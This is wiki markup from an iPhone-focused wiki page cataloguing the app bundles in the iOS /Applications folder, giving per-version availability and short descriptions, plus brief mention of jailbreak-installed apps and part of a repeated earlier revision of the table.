| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for [[iAd]] support (Both included on iPad)<br />
|-<br />
| No iPhone or iPod touch version<br />
| No iPad Version<br />
| {{ipfw|AppleTV.app}}<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1.1/4.2.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The Apple TV's equivalent of [[:/System/Library/CoreServices/SpringBoard.app|SpringBoard]]. Used on [[iOS]] 4.2 and higher. Prior to 4.2.1, it was known as Lowtide.app.<br />
|-<br />
| {{ipfw|AppStore.app}}<br />
| {{ipfw|AppStore.app}}<br />
| No Apple TV Version<br />
| App Store<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Client for the [[App Store]]<br />
|-<br />
| {{ipfw|AskPermissionUI.app}}<br />
| {{ipfw|AskPermissionUI.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| App for the UI for Family Sharing purchase confirmations<br />
|-<br />
| {{ipfw|BugReporter.app}}<br />
| {{ipfw|BugReporter.app}}<br />
| No Apple TV Version<br />
| Bug Reporter<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| An app for conveniently reporting bugs, specific to beta releases starting with iOS 8.<br />
|-<br />
| {{ipfw|Calculator.app}}<br />
| No iPad version<br />
| No Apple TV Version<br />
| Calculator<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calculator. Icon evolved over major OS releases. Landscape scientific mode added in iOS 2.0.<br />
|-<br />
| {{ipfw|Camera.app}}<br />
| {{ipfw|Camera.app}} ([[iPad 2]] and newer only)<br />
| No Apple TV Version<br />
| Camera<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Camera. Split from {{ipfw|MobileSlideShow.app}} starting with iOS 4.0.<br />
|-<br />
| {{ipfw|Compass.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Compass<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Compass. Only available on [[Magnetometer|qualifying devices]].<br />
|-<br />
| {{ipfw|CompassCalibrationViewService.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|Contacts~iphone.app}} (MobileAddressBook.app before iOS 4)<br />
| {{ipfw|Contacts~ipad.app}}<br />
| No Apple TV Version<br />
| Contacts<br />
| {{partial}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Contacts.<br />
|-<br />
| {{ipfw|Copilot.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|DDActionsService.app}}<br />
| {{ipfw|DDActionsService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|DemoApp.app}}<br />
| {{ipfw|DemoApp.app}}<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Displays a video continuously when the device is not being used. Invoke with a file called Demo.mov in the user directory ([[/private/var/root]] for iOS 1.1.2 and lower, [[/private/var/mobile]] for iOS 1.1.3 and later). Used by Apple Stores.<br />
|-<br />
| {{ipfw|Diagnostics.app}} (Not to be confused with iOS Diagnostics.app, Diagnostics.app currently serves no purpose)<br />
| {{ipfw|Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Currently, this serves no clear purpose. It has lorem ipsum inside it, and agree and disagree buttons and a cancel button in the top left corner. Hitting disagree or cancel closes the app. Hitting agree transfers it to a "Waiting..." screen with a button saying Test.<br />
|-<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Facebook service.<br />
|-<br />
| {{ipfw|FaceTime.app}}<br />
| {{ipfw|FaceTime.app}}<br />
| No Apple TV Version<br />
| FaceTime<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[FaceTime]] application for devices running iOS 7 or later.<br />
|-<br />
| {{ipfw|Family.app}}<br />
| {{ipfw|Family.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Application for Family Sharing. Doesn't appear to work yet.<br />
|-<br />
| {{ipfw|FieldTest.app}}<br />
| {{ipfw|FieldTest.app}} (3G only)<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{partial|See notes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for checking network parameters; Can be accessed by dialing [[Phone.app codes|<code>*3001#12345#*</code>]]; Retired in 4.0, returns in 4.1 providing only the cellular network RSSI display. iOS 4.2 brings all features back.<br />
|-<br />
| {{ipfw|GameCenterUIService.app}}<br />
| {{ipfw|GameCenterUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|GameCenter~iphone.app}}<br />
| {{ipfw|GameCenter~ipad.app}}<br />
| No Apple TV Version<br />
| Game Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Game Center.<br />
|-<br />
| {{ipfw|Health.app}}<br />
| {{ipfw|Health.app}}<br />
| No Apple TV Version<br />
| Health<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| The Health app. Works as the center of HealthKit enabled apps.<br />
|-<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| A service for Health.app, apparently in place to protect your privacy.<br />
|-<br />
| {{ipfw|iAdOptOut.app}}<br />
| {{ipfw|iAdOptOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iBooks.app}}<br />
| {{ipfw|iBooks.app}}<br />
| No Apple TV Version<br />
| iBooks<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| iBooks app built into iOS 8.<br />
|-<br />
| {{ipfw|InCallService.app}}<br />
| {{ipfw|InCallService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| This can be accessed through Safari; just type diags:// into the URL bar.<br />
|-<br />
| {{ipfw|iPodOut.app}}<br />
| {{ipfw|iPodOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| Hidden app for iPodOut functionality with third party equipment such as car entertainment systems. Provides a media selection and notification view interface through the video output.<br />
|-<br />
| {{ipfw|iTunes.app}} (Not to be confused with MobileStore.app, the iTunes Store app)<br />
| {{ipfw|iTunes.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app. Crashes on startup. Purpose not known.<br />
|-<br />
| {{ipfw|kbd.app}}<br />
| {{ipfw|kbd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| <br />
|-<br />
| {{ipfw|MailCompositionService.app}}<br />
| {{ipfw|MailCompositionService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Maps~iphone.app}} (Maps.app on iOS 7)<br />
| {{ipfw|Maps~ipad.app}}<br />
| No Apple TV Version<br />
| Maps<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Maps.<br />
|-<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
|-<br />
| {{ipfw|MessagesViewService.app}}<br />
| {{ipfw|MessagesViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|MobileCal.app}}<br />
| {{ipfw|MobileCal.app}}<br />
| No Apple TV Version<br />
| Calendar<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calendar.<br />
|-<br />
| {{ipfw|MobileMail.app}}<br />
| {{ipfw|MobileMail.app}}<br />
| No Apple TV Version<br />
| Mail<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mail. Updated in iOS 4 and iOS 7.<br />
|-<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| No Apple TV Version<br />
| iPod; Music; Videos<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| iPod/Music/Videos. Uses the '''[[Application Roles]]''' feature to have more than one icon. Split into separate Music/Videos apps since iOS 5.<br />
|-<br />
| {{ipfw|MobileNotes.app}}<br />
| {{ipfw|MobileNotes.app}}<br />
| No Apple TV Version<br />
| Notes<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Notes.<br />
|-<br />
| {{ipfw|MobilePhone.app}}<br />
| {{ipfw|MobilePhone.app}} (iPad 2 and newer only, running iOS 6 and under)<br />
| No Apple TV Version<br />
| Phone; FaceTime for iOS 6 and under<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Only FaceTime is shown on the iPad and iPod touch. On iOS 7 FaceTime is an independent application. Uses the '''Application Roles''' feature to have more than one icon.<br />
|-<br />
| {{ipfw|MobileReplayer.app}}<br />
| {{ipfw|MobileReplayer.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| MobileReplayer's purpose isn't known. Crashes upon startup.<br />
|-<br />
| {{ipfw|MobileSafari.app}}<br />
| {{ipfw|MobileSafari.app}}<br />
| No Apple TV Version<br />
| Safari<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mobile Safari web browser.<br />
|-<br />
| {{ipfw|MobileSlideShow.app}}<br />
| {{ipfw|MobileSlideShow.app}}<br />
| No Apple TV Version<br />
| Photos (iOS 4 and above); Photos, Camera (older OS versions)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Photo Albums, Places, Faces*, Events* and Import°.<br />
<br />
<nowiki>* </nowiki>Mac only.<br />
<br />
° with iPad Camera Connection Kit<br />
|-<br />
| {{ipfw|MobileSMS.app}}<br />
| {{ipfw|MobileSMS.app}}<br />
| No Apple TV Version<br />
| [[Messages]]; Text (iPhone OS < 2.2.1)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| SMS, MMS and [[iMessage]]<br />
|-<br />
| {{ipfw|MobileStore.app}}<br />
| {{ipfw|MobileStore.app}}<br />
| No Apple TV Version<br />
| iTunes Store (iTunes prior to iOS 7)<br />
| {{partial|1.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The iTunes Store, allows purchasing of Music, Videos, Movies, TV Shows, and more.<br />
|-<br />
| {{ipfw|MobileTimer.app}} (MobileTimer~iphone.app on iOS 6 only)<br />
| {{ipfw|MobileTimer~ipad.app}} (only from iOS 6)<br />
| No Apple TV Version<br />
| Clock<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| World Clocks, Alarms, Stopwatch and countdown Timer.<br />
|-<br />
| {{ipfw|Music~iphone.app}} (Music.app on iOS 7)<br />
| {{ipfw|Music~ipad.app}}<br />
| No Apple TV Version<br />
| Music<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app. Icon is identical to the one previously only displayed on iPod touches.<br />
|-<br />
| {{ipfw|Nike.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Nike+iPod<br />
| {{no}}<br />
| {{partial|2.2.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Nike+iPod. Only on applicable devices (iPod touch 2G, iPhone 3G, and newer) when enabled in Settings.<br />
|-<br />
| {{ipfw|Podcasts.app}}<br />
| {{ipfw|Podcasts.app}}<br />
| No Apple TV Version<br />
| Podcasts<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Podcasts app built into iOS 8.<br />
|-<br />
| {{ipfw|PreBoard.app}}<br />
| {{ipfw|PreBoard.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown, crashes at start.<br />
|-<br />
| {{ipfw|Preferences.app}}<br />
| {{ipfw|Preferences.app}}<br />
| No Apple TV Version<br />
| Settings<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Settings.<br />
|-<br />
| {{ipfw|PrintStatus.app}}<br />
| {{ipfw|PrintStatus.app}}<br />
| No Apple TV Version<br />
| Print Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Print Center.<br />
|-<br />
| {{ipfw|quicklookd.app}}<br />
| {{ipfw|quicklookd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Reminders.app}}<br />
| {{ipfw|Reminders.app}}<br />
| No Apple TV Version<br />
| Reminders<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Reminders application.<br />
|-<br />
| {{ipfw|Setup.app}}<br />
| {{ipfw|Setup.app}}<br />
| No Apple TV Version<br />
| Setup<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden setup app. Opens automatically after a restore.<br />
|-<br />
| {{ipfw|Passbook.app}} (Shoebox.app prior to iOS 7)<br />
| No iPad Version<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Passbook.<br />
|-<br />
| {{ipfw|SiriViewService.app}}<br />
| {{ipfw|SiriViewService.app}}<br />
| No Apple TV Version<br />
| Siri<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[Siri]] controller.<br />
|-<br />
| {{ipfw|ShoeboxUIService.app}} (PassbookUIService.app on iOS 7)<br />
| {{ipfw|ShoeboxUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
|<br />
|-<br />
| {{ipfw|SocialUIService.app}}<br />
| {{ipfw|SocialUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Stocks.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Stocks<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Stocks. Updated in iPhone OS 3.0 and iOS 7.<br />
|-<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Account Migration (??) for Tencent Weibo Accounts<br />
|-<br />
| {{ipfw|TrustMe.app}}<br />
| {{ipfw|TrustMe.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Related to SSL and certificates.<br />
|-<br />
| {{ipfw|UserAuthentication.app}}<br />
| {{ipfw|UserAuthentication.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown app. Does nothing when launched. Might be used for the iOS 8 Touch ID API.<br />
|-<br />
| {{ipfw|Videos.app}}<br />
| {{ipfw|Videos.app}}<br />
| No Apple TV Version<br />
| Videos<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app.<br />
|-<br />
| {{ipfw|VoiceMemos.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Voice Memos<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Voice Memos. Requires <code>encode-aac</code> capability and a microphone.<br />
|-<br />
| {{ipfw|Weather.app}}<br />
| {{ipfw|Weather.app}}<br />
| No Apple TV Version<br />
| Weather<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Weather. Updated for fast app switching support and hourly forecast and in iOS 6.<br />
|-<br />
| {{ipfw|Web.app}}<br />
| {{ipfw|Web.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Runs fullscreen web clips.<br />
|-<br />
| {{ipfw|WebApp1.app}}<br />
| {{ipfw|WebApp1.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown purpose, crashes on startup<br />
|-<br />
| {{ipfw|WebContentAnalysisUI.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|WebSheet.app}}<br />
| {{ipfw|WebSheet.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Used for overlaying web data. Usually for logging in to Wi-Fi Hotspots which use forced webpages to request user data.<br />
|-<br />
| {{ipfw|WebViewService.app}} (WebUIService prior to iOS 7)<br />
| {{ipfw|WebViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|WhatsNew.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|YouTube.app}}<br />
| {{ipfw|YouTube.app}}<br />
| No Apple TV Version<br />
| YouTube<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| Watch [http://youtube.com YouTube] videos; removed in iOS 6 beta 4 according with the Google License.<br />
|}<br />
<br />
==== Unofficial Apps ====<br />
These application bundles are not present on an unmodified system and are generally installed via a PC utility, manually or through a package. More applications may be installed after jailbreak.<br />
* [[Installer.app]] (AppTapp Installer)<br />
* [[blackra1n.app]] ([[blackra1n]] and [[limera1n]])<br />
* [[Cydia.app]] (Cydia Installer)<br />
<br />
=== Files ===<br />
(none)<br />
<br />
== Parents ==<br />
{{parent}}<br />
<br />
[[Category:Filesystem]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=/Applications&diff=41345
/Applications
2014-06-19T19:06:10Z
<p>Ryandolan123: Removed details on ping, added more details about the iTunes Store</p>
<hr />
<div>== Summary ==<br />
This is where all of the pre-installed native apps, as well as native jailbreak apps (from Cydia and elsewhere), are installed. They can't be deleted under normal circumstances. One can delete them on a jailbroken device through some sort of file-management tool such as SSH or iFile, although doing this is highly unrecommended as they can't be re-installed.<br />
<br />
New user apps are installed via iTunes or the App Store in the [[/private/var/mobile/Applications]] folder.<br />
<br />
== Children ==<br />
=== Folders ===<br />
*{{ipfw|Utilities}} <br />
==== Native Apps ====<br />
{| class="wikitable sortable" style="table-layout: fixed; border-collapse: collapse;" border="1"<br />
|-<br />
! Folder name (generic)<br />
! Folder name ([[iPad]] version)<br />
! Folder name ([[Apple TV]] version)<br />
! Application name<br />
! 1.x<br />
! 2.x<br />
! 3.x<br />
! 4.x <br />
! 5.x<br />
! 6.x<br />
! 7.x<br />
! 8.x (beta)<br />
! Description<br />
|-<br />
| {{ipfw|AACredentialRecoveryDialog.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|AdSheet.app}} (iAd.app in iOS 8)<br />
| {{ipfw|AdSheet~ipad.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for [[iAd]] support (Both included on iPad)<br />
|-<br />
| No iPhone or iPod touch version<br />
| No iPad Version<br />
| {{ipfw|AppleTV.app}}<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1.1/4.2.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The Apple TV's equivalent of [[:/System/Library/CoreServices/SpringBoard.app|SpringBoard]]. Used on [[iOS]] 4.2 and higher. Prior to 4.2.1, it was known as Lowtide.app.<br />
|-<br />
| {{ipfw|AppStore.app}}<br />
| {{ipfw|AppStore.app}}<br />
| No Apple TV Version<br />
| App Store<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Client for the [[App Store]]<br />
|-<br />
| {{ipfw|AskPermissionUI.app}}<br />
| {{ipfw|AskPermissionUI.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| App for the UI for Family Sharing purchase confirmations<br />
|-<br />
| {{ipfw|BugReporter.app}}<br />
| {{ipfw|BugReporter.app}}<br />
| No Apple TV Version<br />
| Bug Reporter<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| An app for conveniently reporting bugs, specific to beta releases starting with iOS 8.<br />
|-<br />
| {{ipfw|Calculator.app}}<br />
| No iPad version<br />
| No Apple TV Version<br />
| Calculator<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
